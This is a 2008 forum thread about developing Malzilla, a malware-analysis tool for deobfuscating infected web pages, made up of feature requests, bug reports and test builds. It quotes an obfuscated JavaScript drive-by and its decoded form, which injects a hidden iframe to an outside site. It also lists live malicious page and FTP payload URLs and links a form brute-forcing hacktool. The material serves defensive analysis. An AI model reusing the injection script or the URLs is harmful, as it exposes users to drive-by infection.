<form name="{VALUE}" action="{FILE}" method="{POST_OR_GET}">
{FIELDS}
</form>

Where {FIELDS} is typically one or more of the following;

Code: [Select]
<input type="text" ....>
<input type="hidden" ...>
<input type="checkbox" ....>
<input type="password" ....>
<input type="radio" .....>
<textarea .....>
<select ....>

The spec is available at;

http://www.w3.org/TR/html4/interact/forms.html

The spec mentions the use of LABEL for the field names;

Code: [Select]
<FORM action="http://somesite.com/prog/adduser" method="post">
    <P>
    <LABEL for="firstname">First name: </LABEL>
              <INPUT type="text" id="firstname"><BR>
    <LABEL for="lastname">Last name: </LABEL>
              <INPUT type="text" id="lastname"><BR>
    <LABEL for="email">email: </LABEL>
              <INPUT type="text" id="email"><BR>
    <INPUT type="radio" name="sex" value="Male"> Male<BR>
    <INPUT type="radio" name="sex" value="Female"> Female<BR>
    <INPUT type="submit" value="Send"> <INPUT type="reset">
    </P>
 </FORM>

... but I've never seen anyone use that ..... typically people use td's to seperate these, for example;

Code: [Select]
<form action="{file}" name="{VALUE}" method="{GET_OR_POST}">
<table>
<tr><td>Name:</td><td><input type="{TYPE}"></td></tr>
</table>
</form>
Title: Re: MalZilla
Post by: bobby on March 16, 2008, 08:24:22 pm
Ah, I got it now, thanks MysteryFCM.
I didn't realize it is about POST forms (thats what I call them, probably wrong but...)

@sowhat-x
Problem is, I don't get it what I should extract here?
You want me to render the form, so you can enter values and send the form data?
Malzilla intentionally does not have any rendering engine. That way it can stay away of being exploited in the same manner like browsers are exploited.
Title: Re: MalZilla
Post by: MysteryFCM on March 16, 2008, 08:40:27 pm
Malzilla intentionally does not have any rendering engine. That way it can stay away of being exploited in the same manner like browsers are exploited.

Same reason vURL DE doesn't :)
Title: Re: MalZilla
Post by: sowhat-x on March 16, 2008, 09:27:39 pm
...MysteryFCM was way faster than me in replying,he-he...
yes,it's 'post' forms I was talking about,and actually,
I was afraid of the term being confused with...Delphi 'forms' themselves,lol...  :)
Have a look at this python app called 'twill" for example,
among other things,the 'showforms' command can give the very exact idea of it:
http://twill.idyll.org/

Being able to fill in/send 'post' data is not of that much interest I guess,
it's not 'web application' testing after all...I mean,I have never seen some kind of infected page,
that 'rotates'/pushes different exploits and malware,depending on user's input on post forms...
Maybe others more experienced have,I certainly haven't though...brrr...nasty thought...

Simply listing them though,separated from the rest of the html code,would be quite nice...
ie.to have a more 'clean' idea of the html's structure...
Title: Re: MalZilla
Post by: bobby on March 16, 2008, 09:40:43 pm
I did saw some web sites that required POST data to get the process to continue.
In one such case I have worked together with MysteryFCM :)

The fact is, in last two years I have probably saw some 5 such cases.
Some kind of POST editor does exists on my ToDo list for Malzilla, but I didn't gave it any priority and I do not have a clear picture how it should look like.

I still do not have a clear picture what a form tab should show to the user...
List of forms (do every form in HTML have a unique identifier if more than one form is on the page)?
Separate tab for every form found which would show the code of that form?
Title: Re: MalZilla
Post by: sowhat-x on March 16, 2008, 09:42:38 pm
...or another one that came to mind,a really older vb-coded app,
that was called 'Form Scalpel'...it is still available from PacketStorm's repository:
http://packetstormsecurity.org/web/index2.html
Honestly though,don't really bother yourself much with it,
as this is something that simply helps in reading/breaking down the html structure,
ie.it certainly doesn't help in making the malware scripts themselves more 'readable' in any way...

Quote
I still do not have a clear picture what a form tab should show to the user...
Something somewhat similar to 'Judas' that I posted today in the forum,
or say like 'Form' came to mind...want me to upload somewhere else instead of Rapidshare?
Title: Re: MalZilla
Post by: MysteryFCM on March 16, 2008, 09:53:51 pm
Bobby,
Generally speaking, the form tag will include either "name", "id" or both (e.g. name="{NAME}" or id="{ID}"). However, as nested forms are very rare, it's generally just a case of parsing out everything between the opening and closing form tags (and where more than one form is present, then processing the second, third whatever form).

I'm not sure about Delphi, but with MS XML, it's simply a case of identifying which method it expects (GET or POST), then identifying the fields it is expecting (including the hidden one's), then sending the data it's expecting via an XML request.

To have this in Malzilla would probably be best by doing the following;

1. ID the form and it's action value
2. ID the fields within the form
3. Provide a string builder for the fields the form expects

Obviously it'll not be as simple as I've made it sound, but it's just a thought :)
Title: Re: MalZilla
Post by: sowhat-x on March 16, 2008, 10:10:34 pm
...quickly uploaded both 'Form' and 'Judas' to Googlepages as well,
password is simply 'password',without quotes...
http://sowhatx.googlepages.com/FormFinal.rar
http://sowhatx.googlepages.com/Judas.rar

Note that some AV products flag 'Form' as a 'Hacktool',
since it was meant for bruteforcing html pages,he-he...  :D

Edit:Uploaded 'Form Scalpel' as well,same password...
(the extra vb dlls might need regsvr32 first):
http://sowhatx.googlepages.com/FormScalpel.rar
Title: Re: MalZilla
Post by: bobby on March 24, 2008, 09:14:03 pm
Sorry for the late reply... I was pretty busy last couple of days.
New Malzilla uploaded:
https://sourceforge.net/project/showfiles.php?group_id=203466

We are now using hacked SpiderMonkey.
Please also take a look at the new tutorials.

@sowhat-x
Thanks for the uploads. Got them all ;)
Title: Re: MalZilla
Post by: MysteryFCM on March 24, 2008, 09:22:48 pm
Nice one cheers :)
Title: Re: MalZilla
Post by: sowhat-x on March 25, 2008, 11:23:08 am
Heh,compared with earlier v0.91/v0.92 builds,it's miles ahead...  ;D

...made a single pdf from the first 3 Malzilla's tutorials for 'offline' usage:
now why would anyone need them if being offline in the first place,
that's something beyond my imagination,he-he...but anyway... :D
http://rapidshare.com/files/102201005/MalzillaIntro.pdf.html
Alternatively:
http://www.megaupload.com/?d=IFMPWEVK

Wasn't really sure on how to handle the scripts in the newest two documents:
on the one hand,I couldn't get them to properly fit as 'static' printed images,
and I also didn't really liked the idea of handling them as pdf 'attachments'.
I preferred to leave them out for the time being,if any other suggestions/ideas arise...

P.S:...ehmm...felt a bit embarrassed...i mean,regarding the 'about' box:
as it's JohnC that's doing all the 'real'/hard work...
Title: Re: MalZilla
Post by: MysteryFCM on March 25, 2008, 12:01:29 pm
Just got some time to look at the tutorials too and they're great dude :) (good to see the code I had problems with in there too as it may have confused others too  :-[).
Title: Re: MalZilla
Post by: tjs on March 25, 2008, 05:59:18 pm
Great stuff!

When you use malzilla on dual monitors, and malzilla is in focus on the secondary monitor the splash screen stays on top on the primary monitor.

Title: Re: MalZilla
Post by: bobby on March 25, 2008, 06:02:46 pm
@MysteryFCM

There is no offense meant by putting your script there under such title. It is just so that you found an extraordinary example.
Breaking the unicode sequences in a such way like in your script - I didn't saw anything like that before, and I'm really happy that you found it.
It was a reason to add concatenating function to Malzilla and a good lesson (for me) that one must not forget to take a look at some simple things, not always searching for clues in some complicated functions.

I tried to blog about some interesting "species", but Blogspot is a real PITA when it comes to text formating:
http://malzilla.blogspot.com/
I gave up on that blog.

@sowhat-x

Do not undervalue your contribution to Malzilla and to this discussion.
I do not have a lot of feedback on Malzilla, and I appreciate every single post here. That gives me some motivation to work further.
Apart of this thread here, there is one more guy posting in forum provided by SourceForge, one contact per email (asking for Linux version which I promised to finish, but never got time to get it to the same level like Windows version) and some feedback on Ethical Hacker Network.
So, I appreciate your feedback a lot.

@TJS
I got some other reports on strange behavior of that splash screen (try Alt + Tab on single monitor).
I'll probably remove it from the next upload, as I really can't find whats wrong, as the code looks OK.


@all
Does the new handling of eval() function do a better job for you than previous hacks?
Title: Re: MalZilla
Post by: tjs on March 25, 2008, 06:24:51 pm
* I havent had any issues with the new eval() handling.
* I suggest that you put an option to not display splash screen instead of removing it (this seems to be a standard in software today).. that way you can still have a splash :)

TJS
Title: Re: MalZilla
Post by: bobby on March 25, 2008, 06:33:29 pm
@TJS

Try the script from Tutorial 5 on Malzilla's website to see the power of the new eval() handling.
After that, try the same script with older versions (pre-release 3) if you still have them (I've deleted them from the server).
In older releases you could only get some info by taking a look at the variables in debugger.
With new version you will get the complete script :)
Title: Re: MalZilla
Post by: tjs on March 26, 2008, 12:19:47 am
Very nice!!

Does this introduce any additional security risk? I'll buy beer for anyone that finds a way to get malzilla to execute a payload using some scripting magic and discloses it to bobby in a responsible manner.

Another crazy suggestion:

How about a scripting API so that I can start using malzilla in an automated way against a list of URLs? Perhaps to be able to input a list of URLs and have malzilla automatically deobfuscate each one until certain conditions are met (ex. till a string [.exe|GET|etc] is found, or after n iterations) while writing each 'layer' to disk.

8)
TJS
Title: Re: MalZilla
Post by: cjeremy on March 26, 2008, 12:41:08 am
Quote
How about a scripting API so that I can start using malzilla in an automated way against a list of URLs? Perhaps to be able to input a list of URLs and have malzilla automatically deobfuscate each one until certain conditions are met (ex. till a string [.exe|GET|etc] is found, or after n iterations) while writing each 'layer' to disk.

Why not just use the SpiderMonkey API and a wrapper script to automate this for your standard JavaScript obfustication?  Before I started using Malzilla (which I love now) for most of my analysis I would use Perl wrapper scripts and the SpiderMonkey engine, pipe this output into a database which would then allow me to perform relational comparisons....  Not the end all be all solution, but done fairly easily.  Then for any obfucticated scripts you can't parse with your current script libraries use Malzilla, translating your findings into your automated scripts for future occurrences.  I say again, I love using Malzilla and Bobby has done an outstanding job, but an automated solution would be optimal....  On the other hand maybe an open API would boost support and use of Bobby's creation, maybe??? 
Title: Re: MalZilla
Post by: bobby on March 26, 2008, 05:18:46 am
@TJS

If SpiderMonkey itself is vulnerable, then the Malzilla would also be vulnerable.
There is no additional risk added by this hack.
All that this hack is doing is to log what the eval() function got as arguments.
Each call will produce a file in eval_temp folder.
After script completes, Malzilla will eliminate duplicates in eval_temp, and show you the rest.

About automation, I did think about it (using PScript from Malzilla), but it is not so easy.
Malzilla is multi-thread application, and a lot of events are based on callback functions.
Using them in in environment that is not object-oriented is a real pain.

Example: when you run a script in decoder, Mailzilla's main thread (the user interface) is not waiting for the decoding thread to finish (that would freeze the interface). When the thread finishes, it calls a callback function in Malzilla, letting it know that the results are waiting to be displayed.

Thats just reminded me that there is bug in Malzilla :)
If you run a script which takes some time to finish, and create a new Decoder tab before the results are there, the results will be displayed on new tab, not on the tab from where you've sent them.

@cjeremy
Can you make a short tutorial on how you are running Malzilla under Wine on Linux? Please.
Title: Re: MalZilla
Post by: MysteryFCM on March 26, 2008, 02:03:24 pm
@MysteryFCM

There is no offense meant by putting your script there under such title. It is just so that you found an extraordinary example.
Breaking the unicode sequences in a such way like in your script - I didn't saw anything like that before, and I'm really happy that you found it.
It was a reason to add concatenating function to Malzilla and a good lesson (for me) that one must not forget to take a look at some simple things, not always searching for clues in some complicated functions.

I tried to blog about some interesting "species", but Blogspot is a real PITA when it comes to text formating:
http://malzilla.blogspot.com/
I gave up on that blog.

No offense taken :)
Title: Re: MalZilla
Post by: cjeremy on March 27, 2008, 12:38:12 am
@bobby

Not much of tutorial I am afraid.  It is very simple if you can get the prerequisite wine installed and running.  There are a million tutorials for installing wine and specific instructions can depend upon which distro your using.  For Ubuntu/Kubuntu Gutsy (7.10) it is fairly simple just:

1.  sudo wget http://wine.budgetdedicated.com/apt/sources.list.d/gutsy.list -O /etc/apt/sources.list.d/winehq.list
2.  sudo apt-get update
3.  sudo apt-get install wine

Once wine is installed then it as simple as follows:

1.   wget http://superb-west.dl.sourceforge.net/sourceforge/malzilla/malzilla_0.9.3pre4.zip  (from your favorite sourceforge mirror)
2.   mv malzilla_0.9.3pre4.zip ~/.wine/drive_c/Program\ Files/
3.   cd ~/.wine/drive_c/Program\ Files/
4.   unzip malzilla_0.9.3pre4.zip
5.   cd malzilla_0.9.3pre4/
6.   wine malzilla.exe &  ( execute it with wine )

This works for me, but as anything in the world of software your mileage may vary! 

--jeremy



 
Title: Re: MalZilla
Post by: bobby on March 27, 2008, 06:16:25 pm
Guys, I apologize, but something is wrong with the previous upload.
At creating the ZIP to upload, my file manager didn't added the folders, just the files.
This is very important, as some function do not work without all the temp folders.
I've fixed this in the manner that Malzilla is now creating all the missing folders if these are not already there.
Some other interface bugs are fixed too.

Please download the new ZIP (0.9.2.5) from SourceForge.
Title: Re: MalZilla
Post by: JohnC on April 03, 2008, 04:07:29 pm
Is it possible to have the space between "Send script to decoder" and "Find objects" made smaller. Also the space below "Find objects", so that the main download part can be a tiny bit bigger. The bits I am talking about have black lines by them in the picture below.

(http://img247.imageshack.us/img247/1706/17827789pf5.png)

Also could the space between "URL", "User Agent", "Referrer" and "Cookies" be made a little smaller so that the main download part can be a little bigger.
Title: Re: MalZilla
Post by: bobby on April 03, 2008, 06:40:16 pm
@JohnC

Done.
I also did that you can collapse/expand that panel.


@cjeremy

May I get your permission to post your tutorial on Malzilla's web site?
Title: Re: MalZilla
Post by: cjeremy on April 04, 2008, 01:51:30 am
@bobby

No worries, go for it!  Not much of tutorial though ;)
Title: Re: MalZilla
Post by: sowhat-x on April 04, 2008, 01:30:11 pm
...he-he,I really like the way that Malzilla has pretty much evolved in being THE standard,
when it comes to analyzing infected/obfuscated webpages...  :)
http://www.securityfocus.com/blogs/716
Title: Re: MalZilla
Post by: tjs on April 11, 2008, 08:50:18 pm
Nice catch sowhat-x... I am really proud that I'm involved with this project in some way.
Keep up the great work, bobby. :)

TJS
Title: Re: MalZilla
Post by: bobby on April 11, 2008, 09:05:11 pm
Thanks guys :)

I'll try to get another upload this weekend. Nothing special changed. There is one more redirection method detected in HTTP headers (thanks JohnC), and little GUI redesign to get more space for page source on Download tab.
I also started some other additions (take a look at right-click menu), but it is still not complete (just internal scripts are working for now).

One more thing is missing in case/log mode, and I'll try to fix it tomorrow.

Next Friday I'm going to vacancy for 3 weeks, and I won't have internet connection (neither a PC at all :) )
Title: Re: MalZilla
Post by: tjs on April 14, 2008, 11:40:27 pm
Another feature request:

How about associating hxxp with malzilla so that we can embed hxxp links in webpages and have them automatically load up with malzilla? That'll save us from having to do lots of copy/pasting from MDL (and other sites) into Malzilla :P

Just another random idea for after your vacations :)

TJS
Title: Re: MalZilla
Post by: Orac on April 15, 2008, 01:39:04 pm
 :-[ I only found out about Malzilla yesterday, its certainly more efficent than Lynx, and i love the decoding functions, sure beats doing it the hard way.

An idea, were seeing more and more FTP RFIs than just a few months ago, any possibility of porting Malzilla for FTP grabs ?
Title: Re: MalZilla
Post by: bobby on April 15, 2008, 03:06:26 pm
@tjs
Doesn't the Clipboard monitor do the job similar to what you request?

@Orac
I'll do something about FTP grabs, but I can do it when I come back from the vacancy.
Title: Re: MalZilla
Post by: tjs on April 15, 2008, 04:08:11 pm
I've had a few bad experiences with the clipboard monitor so I haven't experimented with it too much. I'll check it out.
Title: Re: MalZilla
Post by: bobby on April 15, 2008, 07:16:00 pm
Clipboard monitor can be annoying sometimes.
It monitors clipboard for links (keywords can be defined on Settings tab).

In the beginning, it was a problem that he grabbed all the links twice (double entries in the list).
I've solved that by clearing the clipboard after getting the links.
Solution for Malzilla, but it was a problem for other apps running.

Now, it does not clear the clipboard (other apps should not experience problems while Malzilla is running), but it tries to detect double entries and delete them from the list.

The current problem now is that Clipboard Monitor does also detect internal copy/paste of links inside Malzilla (I do not find this useful) as Malzilla is using the Windows' clipboard.
Title: Re: MalZilla
Post by: bobby on April 18, 2008, 07:50:43 pm
Sorry guys, I didn't succeed in preparing the new release before I go to vacancy (tomorrow morning).
It is full with half-backed functions, and I would not like to upload it in such state.

See you in 3 weeks (3 weeks without a PC :) ).
Title: Re: MalZilla
Post by: MysteryFCM on April 18, 2008, 07:52:16 pm
Have fun dude :)
Title: Re: MalZilla
Post by: JohnC on April 18, 2008, 07:56:36 pm
Have a nice time away :)
Title: Re: MalZilla
Post by: bobby on April 18, 2008, 08:16:46 pm
Thanks guys.

The following is not official release (but you can get it if you want to try it):
http://rapidshare.com/files/108547702/malzilla.exe.html
You will need the dll files from the latest official version of Malzilla:
http://sourceforge.net/project/showfiles.php?group_id=203466&package_id=242804&release_id=587544

Whats is half-backed:
- you will see "Run script" in right-click menu (works on selected text, or on whole text if no selection is made). Internal scripts are working, external are not implemented at all
- the state of "Use referrer" on Download page is not saved in INI file for the next session
- Download panel - button panels can be hidden (click anywhere between the buttons) to extend the space for downloaded source and HTTP headers. There is problems with some combinations of resizing the form and hide/unhide the panels - buttons are not always restored to the right position
- some JavaScripts can break Malzilla if "Debug" is used. It does not break if "Run script" is used. It manifests in cleaning all the settings, URL history etc. This bug affects all the previous versions of Malzilla. I can't do a lot here, except of preventing Malzilla to overwrite the settings files with empty ones. This is not an exploit for Malzilla. It is just that Debugger does not finish working (gets stuck), and you need to kill Malzilla. Malzilla will receive the termination signal, and it will do the closing operations (saving settings) which are empty because the thread containing the settings (GUI) is not responding. All the settings files will be overwritten with empty files.

There may be something else that I can't recall at the moment.

Cheers,
bobby
Title: Re: MalZilla
Post by: Orac on April 19, 2008, 02:25:47 pm
Hope you have a great vacation Bobby

Ive had another idea for Malzilla, within the HTTP header section adding the resloved DNS and connection information would be very helpful, especailly when faced with redirects. example
Quote
Resolving ess.trix.net... 200.201.192.41, 200.201.192.31
Connecting to ess.trix.net[200.201.192.41]:80... failed: No route to host.
Connecting to ess.trix.net[200.201.192.31]:80... connected.
Title: Re: MalZilla
Post by: tjs on April 29, 2008, 06:01:37 pm
Looks like SANS is now using Malzilla as part of their training
http://www.sans.org/training/description.php?mid=54

TJS
Title: Re: MalZilla
Post by: jimmyleo on May 10, 2008, 03:05:22 am
hi bobby:

Code: [Select]
<script>
ADDE21259CAE84 = "parseIn";
ADDE21259CAE84 += "t";
A3CB8FA3E0 = "String.fr";
A3CB8FA3E0 += "omC";
A3CB8FA3E0 += "h";
A3CB8FA3E0 += "a";
A3CB8FA3E0 += "rCode";
function DAC027B90(EAA256797A)
{
    var D8BE9398766CD = 676;
    D8BE9398766CD = D8BE9398766CD - 660;
    D59FA5 = eval(ADDE21259CAE84 + "(EAA256797A,D8BE9398766CD)");
    return (D59FA5);
}
function B06AA5(B08FD4DEDD6A39)
{
    var E24A10 = 122;
    E24A10 = E24A10 - 120;
    var D7502F1FF7C = "";
    for (FECA5EB378C6D0E = 0; FECA5EB378C6D0E < B08FD4DEDD6A39.length; FECA5EB378C6D0E += E24A10)
    {
        D7502F1FF7C += ( eval(A3CB8FA3E0 + "(DAC027B90(B08FD4DEDD6A39.substr(FECA5EB378C6D0E,E24A10)))"));
    }
    eval(D7502F1FF7C);
}
B06AA5("76796E3D646F63756D656E742E676574456C656D656E744279496428276B696727293B69662876796E3D3D6E756C6C297B646F63756D656E742E777269746528273C696672616D652069643D6B6967207372633D687474703A2F2F7665726F7373612E696E666F207374796C653D646973706C61793A6E6F6E653E3C2F696672616D653E27293B7D");
</script>

this script may caused Malzilla's decoder as "Working..." state. I choose replace eval() with method and filled in document.write as you know.
but it keeps this state..

and I decode it manually.
Code: [Select]
vyn=document.getElementById('kig');
if(vyn==null)
{
         document.write('<iframe id=kig src=http://verossa.info style=display:none></iframe>');
}
Title: Re: MalZilla
Post by: bobby on May 10, 2008, 08:35:08 pm
Hi jimmyleo,

Use last build and chose "Leave as is" option. You will get the same result like the one you got manually.
Title: Re: MalZilla
Post by: jimmyleo on May 16, 2008, 02:32:25 pm
yeap, got it ;D

and another bug? maybe

link following:
Code: [Select]
hxxp://xindizhi88.com/ai/Yes.htm
jsencode, at first glance. and MZ only decode part of it, and remain is messy characters.

jimi :)
Title: Re: MalZilla
Post by: bobby on May 16, 2008, 04:33:14 pm
Thanks for reporting this bug.
It has something to do with conversion between ASCII and Unicode.
The script decodes OK until first non-English character appears, and it goes into a mess after that.

Please use this online JScript.encode decoder until I get this bug fixed:
http://www.greymagic.com/security/tools/decoder/decoder.asp
Title: Re: MalZilla
Post by: bobby on June 15, 2008, 02:47:42 pm
A little preview of what I'm working on:
http://rapidshare.com/files/122620084/malzilla_preview.zip.html

News:
- handling HTTPS by using OpenSSL (saw a malware last week, which was hosted on a HTTPS)
- minor GUI changes
- internal minimalistic HTML render (still does not handle all HTML tags)
- better Format Code (at least I think it is better). Major difference is that FC will not touch anything inside quotation marks. FOR loops handling is also done better.
- Link Parser - it does Line select now, a click on a line will select the whole line
- Tools - some improvements and new edit functions
- Download tab - please test new option in tab's right-click menu: New tab (next step). Current URL will be a referrer on new tab, and cookies are set. Note that cookies set by scripts in HTML code are not handled, just cookies from HTTP headers are processed by Malzilla

Bugs:
- JSEncode decoder goes messy with Unicode chars in code (JSEncode does not work with Unicode, one need to translate the code page, and even worse - one need to know which code page was in use)
- probably more bugs
- probably even more bugs

ToDo:
- implement more DOM objects (href, location etc.)
- stop working on Malzilla if Symantec and SANS guys keep cropping the screenshots so that the title "Malzilla by bobby" gets cut off from the pictures they post in the blogs. More than that, make a JScript that Symantec and SANS guys can't decode with current Malzilla, and tell them you won't improve Malzilla until they post the whole screenshots
- or implement nag screens which will affect just the Symantec guys (and others who feel embarrassed if they mention that they are using Malzilla) :)

Regressions:
- some JS functions not working anymore (alert, dialogs)

To explain the regression with some JS functions - as of moving the complete interaction with SpiderMonkey into a separate thread, and as a thread isn't a part of GUI (GUI is part of main thread), SpiderMonkey can't access any GUI-related things anymore. This is the next thing I'll work on.
Title: Re: MalZilla
Post by: MysteryFCM on June 15, 2008, 02:54:30 pm
Can you upload it here please? (I've tried numerous times but I'll be damned if I can get the RS captcha correct  ??? )
Title: Re: MalZilla
Post by: bobby on June 15, 2008, 03:05:24 pm
http://malzilla.sf.net/malzilla_preview.zip

Too big to be attached to a post here. I've uploaded to Malzilla site.

Please report bugs, both in GUI and in handling JavaScripts.
If anyone want to send me a script which can't be handled, please save it from Malzilla as a project file (Settings > Download > Add project info to saved files) or please provide the complete URL, referrer, User Agent and cookies.
A lot of scripts are depending on these parameters, and can't be deobfuscated if these are not known.
Title: Re: MalZilla
Post by: MysteryFCM on June 15, 2008, 03:16:22 pm
Nice one, cheers :)
Title: Re: MalZilla
Post by: sowhat-x on June 15, 2008, 05:39:41 pm
In a real hurry at the moment,can't really reply properly...  :-\
Quote
Too big to be attached to a post here.
For future reference:
since people have complained more than a few times about it,he-he...  :D
i've increased attachments' file size up to 2mb...

Quote
- handling HTTPS by using OpenSSL
Won't say more - that's really damned good news  8)
Just something that quickly came to mind,
not a suggestion,just trying to give out ideas...
maybe you'd also like to have a look at MatrixSSL:
http://www.matrixssl.org/
It's 'supposedly' more lightweight/easy to use than OpenSSL...

Quote
- probably more bugs
- probably even more bugs
Lmao!  ;D
We all put 100% trust on you -> but I guess you already knew that...  ;)
So,I translate this to:
Quote
- probably more of excellent hard work from bobby
Title: Re: MalZilla
Post by: Orac on June 15, 2008, 09:14:30 pm
Ive had a quick play with the preview, really like the "New tab (next step)" and can see that coming in useful.

Ive had problems with HTTPS a few times in recent months, this addition will be a major help.

Also like the mini HTML view that should prove to have its uses.

Will comment further when ive used it for a few days.


Many thanks for all the hard work you do for us all :)

Title: Re: MalZilla
Post by: tjs on June 16, 2008, 07:14:18 pm
I got a new bug to report today...

Found a drive-by that pads script with nulls... Malzilla really didn't like this, and neither did textpad's search/replace function.

Here is the original malicious page:
hxxp://ch.moneybee.net/blog/kehker/hker.htm

Let me know if it goes down and you need a copy attached.

Ex:
3C00000000000068000000007400000000006D00006C00003E0000000000000D0A0000000000002000000000000000200000000000003C7300000063000000000000007200000000000000690000007000000000000000007400000000000000

TJS
Title: Re: MalZilla
Post by: bobby on June 16, 2008, 08:11:02 pm
@tjs
Attached to this post is an updated EXE with additional function to remove nulls.
Right click on text box containing NULLs (Decoder, Download, any other text box) > Run Script (internal) > Remove NULLs
Title: Re: MalZilla
Post by: bobby on June 16, 2008, 08:26:25 pm
Forgot to say - Concatenate function is updated too.
Now it can handle even something like the following:
"T" + 'e' & "s" + 't'
Title: Re: MalZilla
Post by: tjs on June 16, 2008, 10:45:20 pm
You rock!
Title: Re: MalZilla
Post by: Orac on June 17, 2008, 12:18:17 pm
One small point.

With Malzilla 0.9.3pre5 we have a box that can be check marked for "Auto-redirect" under Settings/Download

This box is missing from the new version, and instead we get a pop up asking if we want to follow the redirect.

Persoanlly iam finding this pop up to be a bit of a pain, would it be possible to have the Auto-redirect check box back as per 0.9.3pre5
Title: Re: MalZilla
Post by: Orac on June 17, 2008, 01:20:02 pm
 :-[ Ooopppppppps forget my post above, just found it on the download page  :-[
/me books an appointment with the opticans
Title: Re: MalZilla
Post by: bobby on June 17, 2008, 03:36:24 pm
Hi Orac,

It is my fault I didn't mentioned it.
I found it more useful to be on the first page.

I'm not known as someone who is taking notes of what is done/changed/etc. You can see that from the changelogs :)

Next few days I'll do a review of the code. I need to take a look if everything is logged in log/case mode.
After that I'll push another official download on Malzilla's website.

Any suggestions that can be implemented with less work/modifications?

After this version, I'll really go for implementing more DOM objects.
The easiest way is to have them as templates that implements new DOM objects in realtime.
This way anyone can make his own templates which would implement the missing DOM objects.
Guess some of you have no clue what I'm talking about, but it will be much easier when I show that with examples.
Title: Re: MalZilla
Post by: Orac on June 17, 2008, 04:58:56 pm
Quote from: Bobby
Any suggestions that can be implemented with less work/modifications?

I have no idea how much work or modifications would be involved with either of these, but do have two "wish list" items

1. Porting Malzilla for FTP.
2. In the HTTP header section adding resloved DNS and IP connection(s).
Title: Re: MalZilla
Post by: bobby on June 17, 2008, 06:44:18 pm
Hi Orac,

What would you exactly want about FTP?
Just a possibility to download a file from FTP, or a full-featured FTP client (two panels - local and remote folder etc.)
Just getting a file from FTP isn't so hard to do. For Filezilla-alike client I would need a lot of time.

About resolving DNS and such - I have no clue how to do that. I know almost nothing about the theory of resolving DNS servers, lookups and such.
Title: Re: MalZilla
Post by: sowhat-x on June 17, 2008, 10:39:16 pm
Maybe Synapse is of interest...
it provides support for both ftp/dns,works under both win32/*nix...
Heh,just noticed it also has some kind of support for OpenSSL also:
http://www.ararat.cz/synapse/doku.php/features

One older nice piece of code that I keep around for reference,
usable under both win32/*nix...in C though:
http://benoit.papillault.free.fr/c/socket/dns.c
Title: Re: MalZilla
Post by: MysteryFCM on June 18, 2008, 03:37:15 am
Bobby,
For resolving you can use the Windows API :)

gethostbyname
gethostbyaddr

Both a part of the wsock32 DLL

I wrote an AX to do it for my server if you'd like a copy?
Title: Re: MalZilla
Post by: sowhat-x on June 18, 2008, 07:05:19 am
...gethostbyname/gethostbyaddr functions are actually..."Berkeley sockets" API,lol...  ;)
http://en.wikipedia.org/wiki/Berkeley_sockets
Title: Re: MalZilla
Post by: MysteryFCM on June 18, 2008, 07:08:48 am
hehe
Title: Re: MalZilla
Post by: sowhat-x on June 18, 2008, 08:15:27 am
Winsock 2 functions for Delphi...Jedi provides that,
but my guess is that this info is not really something new/helpful to bobby...  :-\
http://jedi-apilib.sourceforge.net/
Here's also an alternative Winsock2 delphi unit implementation,
coded from Aphex,lol...semi-'hackish' source  :)
Title: Re: MalZilla
Post by: Orac on June 18, 2008, 12:17:22 pm
Thanks Bobby

All i want to be able to do is get a file from FTP port 21 using Malzilla, more RFIs are now using FTP:// in place of HTTP:// 

For example heres an active one from last weeks logs,  ftp://193.253.223.43/tmp/trem/oldbisok

A fully featured FTP isnt required, neither is the ability to signin into the FTP port, i just want to grab the file and run. Iam currently using Lynx to do this, if that fails ive had success using a plain vanilla copy of Firefox. Ive never tried with IE, grabing live malware with IE doesnt appeal lol
Title: Re: MalZilla
Post by: bobby on June 18, 2008, 05:46:59 pm
This is a lot of posts to answer :)

@Orac
I'll try to make a simple FTP handling this weekend.

@sowhat-x
Malzilla uses Synapse for HTTP, and I'll use it for FTP  too.
There is a TraceRoute example in Synapse package, but it does not work always. It works well on trying traceroute to Yahoo, but never works for Google.

Here is the main problem - I think I have a solution to get the IP of a website, but I want to do it in one single step with the HTTP "GET" (opening a website).
If anyone can recall, Malzilla got the most attention exactly because it accessed MPack sites in one single step. If you use a downloader that does "HEAD" before "GET", it gets banned from MPack (and other *pack sites).
Now, I'm not sure if asking a DNS server for the IP in one step, and doing it again in HTTP "GET" would produce some false results. I guess it can do if the DNS server is malicious, or resolves to other IP every time you ask for a website.
See, I must find a way to do it in one single step, either by hacking Synapse to get the results right from HTTP "GET" command, or asking on Synapse mailing list if this is already implemented (I couldn't find it last night in the API), or as a last solution - rewrite Malzilla (not to use Synapse anymore, but to do low-level Winsocks calls).
I would not like to go away from Synapse. It would be a loooooooot of work to do.

So, thank you all on searching for a solution, but I need to get a solution for doing this by using Synapse, and to do it in one single DNS server access, which means I need to read the resolved IP address from Synapse at the step where Synapse is doing resolving the host in order to do HTTP GET.
Title: Re: MalZilla
Post by: sowhat-x on June 18, 2008, 06:02:39 pm
...seems that we got destructed with ideas related either to the 'easiness' of daily use,
and/or the implementations of socket-related functions,thereby...
we completely ignored the actual malware-related implications that are involved...  :(
=================

P.S:...not relevant with Malzilla itself...since the dns resolving thing got raised earlier,
I got interested today in searching around cross-platform sources for doing this...
Stumbled upon this one as well...if it's of interest to anyone:
http://aluigi.altervista.org/mytoolz/hostsdns.zip
Title: Re: MalZilla
Post by: bobby on June 18, 2008, 08:27:51 pm
@Orac
Basic FTP is implemented.
I need to fix some minor glitches before I upload a new build.
Title: Re: MalZilla
Post by: Orac on June 19, 2008, 10:38:15 am
Many thanks Bobby :)
Title: Re: MalZilla
Post by: bobby on June 19, 2008, 10:34:11 pm
Orac, can you test this version (attached)?

If you have a file to download from FTP, use GET button (just like for HTTP).
If you want to see a content of a folder on FTP, use CTRL + GET button (URL must be a folder).

If you need to login to the server, use the standard URL scheme:
ftp://user:password@server.com(:port)/folder/file.txt

If the user and pass are not supplied, the following will be used (you must provide login data even for Anonymous access):
user: Anonymous
pass: aa@aa.aa
In the future I'll make this to be set up by the user (settings for anonymous user name and pass). As for now it is hardcoded.

Clipboard Monitor still does not have FTP protocol implemented.
Title: Re: MalZilla
Post by: Orac on June 20, 2008, 09:26:00 am
Bobby Ive downloaded (twice) but it wont open, all iam getting is
Quote
malzilla.exe is not a valid Win32 application



Title: Re: MalZilla
Post by: bobby on June 20, 2008, 09:36:43 am
Works fine here when I download it from my previous post.
Would you like that I upload it somewhere else for you?
Maybe you have connection problems at downloading from MDL.
Title: Re: MalZilla
Post by: Orac on June 20, 2008, 10:16:25 am
I tried a cold reboot of the whole system, downloaded it again but it woudnt open for the same reason :(

